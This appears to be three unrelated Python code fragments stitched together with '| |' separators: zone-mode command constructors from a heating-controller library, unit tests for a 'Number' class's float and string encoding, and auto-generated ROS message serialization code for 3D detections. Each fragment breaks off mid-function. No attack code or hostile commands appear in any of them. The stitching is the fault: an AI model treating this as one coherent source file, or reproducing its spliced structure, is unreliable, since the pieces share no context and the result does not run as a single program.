openwindow_function: bool = False,
multiroom_mode: bool = False,
**kwargs,
):
"""Constructor to set the config of a zone (c.f. parser_000a)."""
assert 5 <= min_temp <= 21, min_temp
assert 21 <= max_temp <= 35, max_temp
assert isinstance(local_override, bool), local_override
assert isinstance(openwindow_function, bool), openwindow_function
assert isinstance(multiroom_mode, bool), multiroom_mode
bitmap = 0 if local_override else 1
bitmap |= 0 if openwindow_function else 2
bitmap |= 0 if multiroom_mode else 16
payload = "".join(
(
f"{zone_idx:02X}",
f"{bitmap:02X}",
temp_to_hex(min_temp),
temp_to_hex(max_temp),
)
)
return cls(W_, _000A, payload, ctl_id, **kwargs)
@classmethod # constructor for RQ/2349
@validate_api_params(has_zone=True)
def get_zone_mode(cls, ctl_id: str, zone_idx: Union[int, str], **kwargs):
"""Constructor to get the mode of a zone (c.f. parser_2349)."""
return cls(RQ, _2349, f"{zone_idx:02X}00", ctl_id, **kwargs) # TODO: needs 00?
@classmethod # constructor for W/2349
@validate_api_params(has_zone=True)
def set_zone_mode(
cls,
ctl_id: str,
zone_idx: Union[int, str],
mode: str = None,
setpoint: float = None,
until: dt = None,
duration: int = None,
**kwargs,
):
"""Constructor to set/reset the mode of a zone (c.f. parser_2349).
The setpoint has a resolution of 0.1 C. If a setpoint temperature is required,
but none is provided, evohome will use the maximum possible value.
The until has a resolution of 1 min.
Incompatible combinations:
- mode == Follow & setpoint not None (will silently ignore setpoint)
- mode == Temporary & until is None (will silently ignore ???)
- until and duration are mutually exclusive
"""
# W --- 18:013393 01:145038 --:------ 2349 013 0004E201FFFFFF330B1A0607E4
# W --- 22:017139 01:140959 --:------ 2349 007 0801F400FFFFFF
mode = _normalise_mode(mode, setpoint, until, duration)
if setpoint is not None and not isinstance(setpoint, (float, int)):
raise TypeError(f"Invalid args: setpoint={setpoint}, but must be a float")
until, duration = _normalise_until(mode, setpoint, until, duration)
payload = "".join(
(
f"{zone_idx:02X}",
temp_to_hex(setpoint), # | |
-0.00000762939453125,'0q7E02_80')
f__q( -0.0000152587890625, '0q7E01_FF', '0q7E02') # alias for -256**-2
f__q(-math.pow(256, -2), '0q7E01_FF')
f__q( -0.0000152587890625, '0q7E01_FF')
f__q( -0.000030517578125, '0q7E01_FE')
f__q( -0.00006103515625, '0q7E01_FC')
f__q( -0.0001220703125, '0q7E01_F8')
f__q( -0.000244140625, '0q7E01_F0')
f__q( -0.00048828125, '0q7E01_E0')
f__q( -0.0009765625, '0q7E01_C0')
f__q( -0.001953125, '0q7E01_80')
f__q( -0.001953125, '0q7E01_80')
f__q( -0.0038604736328125, '0q7E01_03') # -253/65536
f__q( -0.003875732421875, '0q7E01_02') # -254/65536
f__q( -0.0038909912109375, '0q7E01_01') # -255/65536
f__q( -0.00390625, '0q7E00_FF', '0q7E01') # -256/65536 aka -1/256 aka -256**-1
f__q( -0.00390625, '0q7E00_FF') # -256/65536
f__q( -0.0039215087890625, '0q7E00_FEFF') # -257/65536
f__q( -0.003936767578125, '0q7E00_FEFE') # -258/65536
f__q( -0.0039520263671875, '0q7E00_FEFD') # -259/65536
f__q( -0.0078125, '0q7E00_FE')
f__q( -0.01171875, '0q7E00_FD')
f__q( -0.015625, '0q7E00_FC')
f__q( -0.03125, '0q7E00_F8')
f__q( -0.0625, '0q7E00_F0')
f__q( -0.125, '0q7E00_E0')
f__q( -0.25, '0q7E00_C0')
f__q( -0.5, '0q7E00_80')
f__q( -0.75, '0q7E00_40')
f__q( -0.875, '0q7E00_20')
f__q( -0.9375, '0q7E00_10')
f__q( -0.96875, '0q7E00_08')
f__q( -0.998046875, '0q7E00_0080')
f__q( -0.9998779296875, '0q7E00_0008')
f__q( -0.99999237060546875,'0q7E00_000080')
zone_boundary()
f__q( -1.0, '0q7D_FF', '0q7E') # alias for -1
f__q( -1.0, '0q7D_FF')
f__q( -1.000001, '0q7D_FEFFFFEF39085F50')
f__q( -1.00000762939453125,'0q7D_FEFFFF80')
f__q( -1.0001220703125, '0q7D_FEFFF8')
f__q( -1.000244140625, '0q7D_FEFFF0')
f__q( -1.00048828125, '0q7D_FEFFE0')
f__q( -1.0009765625, '0q7D_FEFFC0')
f__q( -1.001953125, '0q7D_FEFF80')
f__q( -1.00390625, '0q7D_FEFF')
f__q( -1.0078125, '0q7D_FEFE')
f__q( -1.015625, '0q7D_FEFC')
f__q( -1.03125, '0q7D_FEF8')
f__q( -1.0625, '0q7D_FEF0')
f__q( -1.1, '0q7D_FEE6666666666660') # TODO: Try more rational weirdos
f__q( -1.125, '0q7D_FEE0')
f__q( -1.25, '0q7D_FEC0')
f__q( -1.5, '0q7D_FE80')
f__q( -1.75, '0q7D_FE40')
f__q( -1.875, '0q7D_FE20')
f__q( -1.9375, '0q7D_FE10')
f__q( -1.96875, '0q7D_FE08')
f__q( -1.998046875, '0q7D_FE0080')
f__q( -1.9998779296875, '0q7D_FE0008')
f__q( -1.99999237060546875,'0q7D_FE000080')
f__q( -2.0, '0q7D_FE')
f__q( -2.00000762939453125,'0q7D_FDFFFF80')
f__q( -2.25, '0q7D_FDC0')
f__q( -2.5, '0q7D_FD80')
f__q( -2.75, '0q7D_FD40')
f__q( -3.0, '0q7D_FD')
f__q( -3.06249999999999645,'0q7D_FCF00000000001')
f__q( -3.0625, '0q7D_FCF0')
f__q( -3.062500000000005, '0q7D_FCEFFFFFFFFFFEA0')
f__q( -4.0, '0q7D_FC')
f__q( -8.0, '0q7D_F8')
f__q( -16.0, '0q7D_F0')
f__q( -32.0, '0q7D_E0')
f__q( -64.0, '0q7D_C0')
f__q( -128.0, '0q7D_80')
f__q( -255.0, '0q7D_01')
f__q( -255.5, '0q7D_0080')
f__q( -255.98046875, '0q7D_0005')
f__q( -255.984375, '0q7D_0004')
f__q( -255.98828125, '0q7D_0003')
f__q( -255.9921875, '0q7D_0002')
f__q( -255.99609375, '0q7D_0001')
f__q( -255.999984741210938, '0q7D_000001')
f__q( -255.999999940395355, '0q7D_00000001')
f__q( -255.999999999767169, '0q7D_0000000001')
f__q( -255.999999999999091, '0q7D_000000000001')
f__q( -255.999999999999943, '0q7D_00000000000010')
f__q( -255.999999999999972, '0q7D_00000000000008')
f__q( -256.0, '0q7C_FF', '0q7D') # alias for -256
f__q( -256.0, '0q7C_FF')
f__q( -256.00390625, '0q7C_FEFFFF')
f__q( -256.0078125, '0q7C_FEFFFE')
f__q( -256.01171875, '0q7C_FEFFFD')
f__q( -256.015625, '0q7C_FEFFFC')
f__q( -256.01953125, '0q7C_FEFFFB')
f__q( -257.0, '0q7C_FEFF')
f__q( -512.0, '0q7C_FE')
f__q( -1024.0, '0q7C_FC')
f__q( -2048.0, '0q7C_F8')
f__q( -4096.0, '0q7C_F0')
f__q( -8192.0, '0q7C_E0')
f__q( -16384.0, '0q7C_C0')
f__q( -32768.0, '0q7C_80')
f__q( -65536.0, '0q7B_FF', '0q7C') # alias for -256**2
f__q( -65536.0, '0q7B_FF')
f__q( -131072.0, '0q7B_FE')
f__q(-4294967296.0, '0q79_FF')
f__q(-2.04586912993508844e+149, '0q40_00000000000008')
f__q(-math.pow(2,992), '0q01_FF', '0q02') # alias for -256**124
f__q(-math.pow(2,992), '0q01_FF')
f__q(-math.pow(2,996), '0q01_F0')
f__q(-math.pow(2,997), '0q01_E0')
f__q(-math.pow(2,998), '0q01_C0')
f__q(-math.pow(2,999), '0q01_80')
f__q(-1.0715086071862672e+301, '0q01_00000000000008') # Boldest (furthest from one) reasonable number that floating point can represent
zone_boundary()
# f__q(math.pow(2,1000), '0q00FFFF83_01') # TODO: -2 ** +1000 == Gentlest (closest to one) negative Ludicrously Large integer.
zone_boundary()
f__q(float('-inf'), '0q00_7F', '0q00FF0000_FA0A1F01_01') # -2**99999999, a ludicrously large negative number
zone_boundary()
f__q(float('-inf'), '0q00_7F')
zone_boundary()
f__q(float('nan'), '0q')
def test_float_ludicrous_large(self):
gentlest_ludicrous = 2.0 ** 1000
boldest_reasonable = 2.0 ** 1000 - 2.0 ** 947
assert gentlest_ludicrous == 1.0715086071862673e+301
assert boldest_reasonable == 1.0715086071862672e+301
self.assertEqual('0qFE_FFFFFFFFFFFFF8', Number(boldest_reasonable).qstring())
# NOTE: significant is 53 1-bits.
if not LUDICROUS_NUMBER_SUPPORT:
with self.assertRaises(NotImplementedError):
Number(gentlest_ludicrous)
with self.assertRaises(NotImplementedError):
Number(sys.float_info.max) # boldest ludicrously large float
# THANKS: http://stackoverflow.com/a/3477332/673991
def test_float_ludicrous_large_negative(self):
gentlest_ludicrous = -2.0 ** 1000
boldest_reasonable = -2.0 ** 1000 + 2.0 ** 947
assert gentlest_ludicrous == -1.0715086071862673e+301
assert boldest_reasonable == -1.0715086071862672e+301
self.assertEqual('0q01_00000000000008', Number(boldest_reasonable).qstring())
if not LUDICROUS_NUMBER_SUPPORT:
with self.assertRaises(NotImplementedError):
Number(gentlest_ludicrous)
with self.assertRaises(NotImplementedError):
Number(-sys.float_info.max)
def test_float_ludicrous_small(self):
"""
Test floats near the positive ludicrously small boundary (2**-1000).
In the naming of all these ludicrous/reasonable boundary test cases
gentlest_ludicrous means
closest to 1.0
at the limit of the ludicrous numbers
closest to the reasonable numbers
furthest from 0.0 or infinity
boldest_reasonable means
furthest from 1.0
at the limit of the reasonable numbers
closest to 0.0 or infinity
closest to the ludicrous numbers
"""
gentlest_ludicrous = 2.0 ** -1000
boldest_reasonable = 2.0 ** -1000 + 2.0 ** -1052
# NOTE: Why -1052, not -1053?
assert gentlest_ludicrous == 9.332636185032189e-302
assert boldest_reasonable == 9.33263618503219e-302
self.assertEqual('0q8183_0100000000000010', Number(boldest_reasonable).qstring())
# NOTE: Significand is 1 1-bit, 51 0-bits, 1 1-bit.
if not LUDICROUS_NUMBER_SUPPORT:
self.assertEqual('0q8183_01', Number(gentlest_ludicrous).qstring())
# TODO:
# with self.assertRaises(NotImplementedError):
# Number(gentlest_ludicrous)
self.assertEqual('0q8180_04', Number(sys.float_info.min).qstring()) # boldest ludicrously small float
# TODO:
# with self.assertRaises(NotImplementedError):
# Number(sys.float_info.min)
def test_float_ludicrous_small_negative(self):
gentlest_ludicrous = -2.0 ** -1000
boldest_reasonable = -2.0 ** -1000 - 2.0 ** -1052
assert gentlest_ludicrous == -9.332636185032189e-302
assert boldest_reasonable == -9.33263618503219e-302
self.assertEqual('0q7E7C_FEFFFFFFFFFFFFF0', Number(boldest_reasonable).qstring())
# TODO: Enforce negative ludicrously small boundary -- or implement these ludicrous numbers:
self.assertEqual('0q7E7C_FF', Number(gentlest_ludicrous).qstring())
# with self.assertRaises(NotImplementedError):
# Number(gentlest_ludicrous)
self.assertEqual('0q7E7F_FC', Number(-sys.float_info.min).qstring())
# with self.assertRaises(NotImplementedError):
# Number(-sys.float_info.min)
def test_copy_constructor(self):
self.assertEqual('0q83_03E8', Number(Number('0q83_03E8')).qstring())
self.assertEqual('0q7C_FEFF', Number(Number('0q7C_FEFF')).qstring())
def test_copy_constructor_ancestored(self):
"""Propagate up the type hierarchy."""
class SonOfNumber(Number):
pass
self.assertEqual('0q83_03E8', Number(SonOfNumber('0q83_03E8')).qstring())
self.assertEqual('0q7C_FEFF', Number(SonOfNumber('0q7C_FEFF')).qstring())
def test_copy_constructor_inherited(self):
"""Propagate down the type hierarchy."""
class SonOfNumber(Number):
pass
self.assertEqual('0q83_03E8', SonOfNumber(Number('0q83_03E8')).qstring())
self.assertEqual('0q7C_FEFF', SonOfNumber(Number('0q7C_FEFF')).qstring())
def test_copy_constructor_related(self):
"""Propagate across the type hierarchy."""
class SonOfNumber(Number):
pass
class DaughterOfNumber(Number):
pass
self.assertIsInstance(SonOfNumber(), Number)
self.assertIsInstance(DaughterOfNumber(), Number)
self.assertNotIsInstance(SonOfNumber(), DaughterOfNumber)
self.assertNotIsInstance(DaughterOfNumber(), SonOfNumber)
self.assertEqual('0q83_03E8', SonOfNumber(DaughterOfNumber('0q83_03E8')).qstring())
self.assertEqual('0q7C_FEFF', DaughterOfNumber(SonOfNumber('0q7C_FEFF')).qstring())
# noinspection PyClassHasNoInit
class GrandSonOfNumber(SonOfNumber):
pass
# noinspection PyClassHasNoInit
class GrandDaughterOfNumber(DaughterOfNumber):
pass
self.assertEqual('0q83_03E8', GrandSonOfNumber(GrandDaughterOfNumber('0q83_03E8')).qstring())
self.assertEqual('0q7C_FEFF', GrandDaughterOfNumber(GrandSonOfNumber('0q7C_FEFF')).qstring())
def test_copy_constructor_by_value(self):
"""Make sure copy constructor copies by value, not reference."""
source = Number(1)
destination = Number(source)
self.assertEqual('0q82_01', source.qstring())
self.assertEqual('0q82_01', destination.qstring())
source.raw = Number(9).raw
self.assertEqual('0q82_09', source.qstring())
self.assertEqual('0q82_01', destination.qstring())
def test_assignment_by_reference(self):
"""Make sure assignment copies by reference, not by value."""
# TODO: Make Number an immutable class, so assignment is by value?
# SEE: Immuutable objects, http://stackoverflow.com/q/4828080/673991
source = Number(1)
destination = source
source.raw = Number(9).raw
self.assertEqual('0q82_09', destination.qstring())
def test_sizeof(self):
"""Illicit snooping into how big these things are."""
expected_sizes = (
28, # Windows 7, 64-bit desktop, Python 2.7.9-12
32, # Windows 7, 64-bit desktop, Python 3.5.1-2
40, # Windows 7, 64-bit desktop, Python 2.7.12 after hardcoding __slots__ to _raw, _zone
56, # Windows 7, 64-bit laptop, Python 2.7.12, 3.5.2
64, # macOS 10, 64-bit macbook, Python 2.7.10
72, # Windows 7, 64-bit desktop, Python 3.6 after hardcoding __slots__ to _raw, _zone
80, # macOS 10, 64-bit mqcbook, Python 2.7.16 (Number slots _raw, _zone)
) # depends on Number.__slots__ containing _zone or not
self.assertIn(sys.getsizeof(Number('0q')), expected_sizes)
self.assertIn(sys.getsizeof(Number('0q80')), expected_sizes)
self.assertIn(sys.getsizeof(Number('0q83_03E8')), expected_sizes)
self.assertIn(sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8')), expected_sizes)
self.assertIn(sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
'E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8'
'E8E8E8E8E8E8E8E8E8E8E8')), expected_sizes)
# Testing getsizeof() on raw was a dumb idea. Anyway it broke over some distinction between laptop and desktop.
# self.assertEqual(py2312( 21, 17, 33), sys.getsizeof(Number('0q').raw))
# self.assertEqual(py2312( 22, 18, 34), sys.getsizeof(Number('0q80').raw))
# self.assertEqual(py2312( 23, 19, 35), sys.getsizeof(Number('0q82_01').raw))
# self.assertEqual(py2312( 24, 20, 36), sys.getsizeof(Number('0q83_03E8').raw))
# self.assertEqual(py2312( 25, 21, 37), sys.getsizeof(Number('0q82_018888').raw))
# self.assertEqual(py2312( 45, 41, 57), sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8').raw))
# self.assertEqual(py2312(144,140,156), sys.getsizeof(Number('0q83_03E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8E8').raw))
#
# self.assertEqual(py2312(21, 17, 33), sys.getsizeof(b''))
# self.assertEqual(py2312(22, 18, 34), sys.getsizeof(b'\x80'))
# self.assertEqual(py2312(24, 20, 36), sys.getsizeof(b'\x83\x03\xE8'))
# self.assertEqual(py2312(45, 41, 57), sys.getsizeof(b'\x83\x03\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8\xE8'))
def test_uneven_hex(self):
self.assertEqual(
Number('0q82_028'),
Number('0q82_0280')
)
self.assertEqual('0q80', Number('0q8').qstring())
self.assertEqual('0q80', Number('0q8_').qstring())
self.assertEqual('0q80', Number('0q_8').qstring())
def test_bad_string_hex(self):
Number('0q')
Number('0q80')
Number('0q82_FF')
with self.assertRaises(Number.ConstructorValueError):
Number('0q8X')
with self.assertRaises(Number.ConstructorValueError):
Number('0q82_FG')
def test_bad_string_prefix(self):
Number('0q')
Number('0q80')
with self.assertRaises(Number.ConstructorValueError):
Number('')
with self.assertRaises(Number.ConstructorValueError):
Number('00q80')
with self.assertRaises(Number.ConstructorValueError):
Number('q80')
def test_string_int(self):
self.assertEqual(1, Number("1"))
self.assertEqual(0, Number("0"))
self.assertEqual(-1, Number("-1"))
self.assertEqual( 11111111111111111, Number("11111111111111111"))
self.assertEqual( 11111111111111112, int(float("11111111111111111")))
self.assertEqual(111111111111111111, Number("111111111111111111"))
self.assertEqual(111111111111111104, int(float("111111111111111111")))
self.assertEqual(11111111111111111111111111111111111111, Number("11111111111111111111111111111111111111"))
self.assertEqual(11111111111111110860978869272892669952, int(float("11111111111111111111111111111111111111")))
def test_string_numeric_Eric_Leschinski(self):
"""
Testing the example number formats (for Python float()) as described by <NAME>.
SPECIAL THANKS: http://stackoverflow.com/a/20929983/673991
"""
with self.assertRaises(Number.ConstructorValueError):
Number("")
self.assertEqual(127, Number("127"))
self.assertEqual(1, Number(True))
# with self.assertRaises(Number.ConstructorTypeError):
# Number(True) # Even though float(True) == 1.0?
with self.assertRaises(Number.ConstructorValueError):
Number("True")
self.assertEqual(0, Number(False))
# with self.assertRaises(Number.ConstructorTypeError):
# Number(False)
self.assertEqual(123.456, Number("123.456"))
self.assertEqual(-127, Number(" -127 "))
self.assertEqual(12, Number("\t\n12\r\n"))
self.assertEqual(Number.NAN, Number("NaN"))
with self.assertRaises(Number.ConstructorValueError):
Number("NaNanananaBATMAN")
self.assertEqual(Number.NEGATIVE_INFINITY, Number("-iNF"))
self.assertEqual(123.0e4, Number("123.E4"))
self.assertEqual(0.1, Number(".1"))
with self.assertRaises(Number.ConstructorValueError):
Number("1,234")
self.assertEqual(0, Number(u'\x30'))
with self.assertRaises(Number.ConstructorValueError):
Number("NULL")
self.assertEqual(0x3fade, Number(0x3fade))
self.assertEqual(Number.POSITIVE_INFINITY, Number("6e7777777777777")) # TODO: Ludicrous Number
self.assertEqual(1.797693e+300, Number("1.797693e+300")) # TODO: MAX_FLOAT support (e+308)
self.assertEqual(Number.POSITIVE_INFINITY, Number("inf"))
self.assertEqual(Number.POSITIVE_INFINITY, Number("infinity"))
with self.assertRaises(Number.ConstructorValueError):
Number("infinityandBEYOND")
with self.assertRaises(Number.ConstructorValueError):
Number("12.34.56")
with self.assertRaises(Number.ConstructorValueError):
Number(u'四')
with self.assertRaises(Number.ConstructorValueError):
Number("#56")
with self.assertRaises(Number.ConstructorValueError):
Number("56%")
self.assertEqual(0e0, Number("0E0"))
self.assertEqual(1, Number(0**0))
self.assertEqual(-5e-5, Number("-5e-5"))
self.assertEqual(+1e1, Number("+1e1"))
with self.assertRaises(Number.ConstructorValueError):
Number("+1e1^5")
with self.assertRaises(Number.ConstructorValueError):
Number("+1e1.3")
with self.assertRaises(Number.ConstructorValueError):
Number("-+1")
with self.assertRaises(Number.ConstructorValueError):
Number("(1)")
def test_string_numeric_space_after_minus(self):
if six.PY2:
self.assertEqual(-42, Number("- 42"))
# NOTE: Python 2 int() is crazy permissive with space after minus.
else:
with self.assertRaises(Number.ConstructorValueError):
Number("- 42")
with self.assertRaises(Number.ConstructorValueError):
Number("- 42.0")
# NOTE: float() sensibly rejects space after minus at any version.
def test_string_numeric_more_errors(self):
with self.assertRaises(Number.ConstructorValueError):
Number("2+2")
with self.assertRaises(Number.ConstructorValueError):
Number("0-0")
with self.assertRaises(Number.ConstructorValueError):
Number("0 0")
with self.assertRaises(Number.ConstructorValueError):
Number("--0")
with self.assertRaises(Number.ConstructorValueError):
Number(" ")
def test_string_numeric_more_formats(self):
self.assertEqual(32, Number("0x20"))
self.assertEqual(0, Number("-0"))
| |
len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v12.is_dense
buff.write(_get_struct_B().pack(_x))
_x = val1.is_tracking
buff.write(_get_struct_B().pack(_x))
_x = val1.tracking_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.detections is None:
self.detections = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.detections = []
for i in range(0, length):
val1 = vision_msgs.msg.Detection3D()
_v15 = val1.header
start = end
end += 4
(_v15.seq,) = _get_struct_I().unpack(str[start:end])
_v16 = _v15.stamp
_x = _v16
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v15.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v15.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.results = []
for i in range(0, length):
val2 = vision_msgs.msg.ObjectHypothesisWithPose()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.id = str[start:end]
start = end
end += 8
(val2.score,) = _get_struct_d().unpack(str[start:end])
_v17 = val2.pose
_v18 = _v17.pose
_v19 = _v18.position
_x = _v19
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v20 = _v18.orientation
_x = _v20
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 288
_v17.covariance = _get_struct_36d().unpack(str[start:end])
val1.results.append(val2)
_v21 = val1.bbox
_v22 = _v21.center
_v23 = _v22.position
_x = _v23
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v24 = _v22.orientation
_x = _v24
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
_v25 = _v21.size
_x = _v25
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v26 = val1.source_cloud
_v27 = _v26.header
start = end
end += 4
(_v27.seq,) = _get_struct_I().unpack(str[start:end])
_v28 = _v27.stamp
_x = _v28
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v27.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v27.frame_id = str[start:end]
_x = _v26
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v26.fields = []
for i in range(0, length):
val3 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
_x = val3
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v26.fields.append(val3)
_x = _v26
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v26.is_bigendian = bool(_v26.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v26.data = str[start:end]
start = end
end += 1
(_v26.is_dense,) = _get_struct_B().unpack(str[start:end])
_v26.is_dense = bool(_v26.is_dense)
start = end
end += 1
(val1.is_tracking,) = _get_struct_B().unpack(str[start:end])
val1.is_tracking = bool(val1.is_tracking)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.tracking_id = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.tracking_id = str[start:end]
self.detections.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.detections)
buff.write(_struct_I.pack(length))
for val1 in self.detections:
_v29 = val1.header
_x = _v29.seq
buff.write(_get_struct_I().pack(_x))
_v30 = _v29.stamp
_x = _v30
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v29.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(val1.results)
buff.write(_struct_I.pack(length))
for val2 in val1.results:
_x = val2.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val2.score
buff.write(_get_struct_d().pack(_x))
_v31 = val2.pose
_v32 = _v31.pose
_v33 = _v32.position
_x = _v33
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v34 = _v32.orientation
_x = _v34
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
buff.write(_v31.covariance.tostring())
_v35 = val1.bbox
_v36 = _v35.center
_v37 = _v36.position
_x = _v37
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v38 = _v36.orientation
_x = _v38
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v39 = _v35.size
_x = _v39
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v40 = val1.source_cloud
_v41 = _v40.header
_x = _v41.seq
buff.write(_get_struct_I().pack(_x))
_v42 = _v41.stamp
_x = _v42
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v41.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v40
buff.write(_get_struct_2I().pack(_x.height, _x.width))
length = len(_v40.fields)
buff.write(_struct_I.pack(length))
for val3 in _v40.fields:
_x = val3.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val3
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = _v40
buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
_x = _v40.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v40.is_dense
buff.write(_get_struct_B().pack(_x))
_x = val1.is_tracking
buff.write(_get_struct_B().pack(_x))
_x = val1.tracking_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
if python3:
codecs.lookup_error("rosmsg").msg_type = self._type
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.detections is None:
self.detections = None
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.detections = []
for i in range(0, length):
val1 = vision_msgs.msg.Detection3D()
_v43 = val1.header
start = end
end += 4
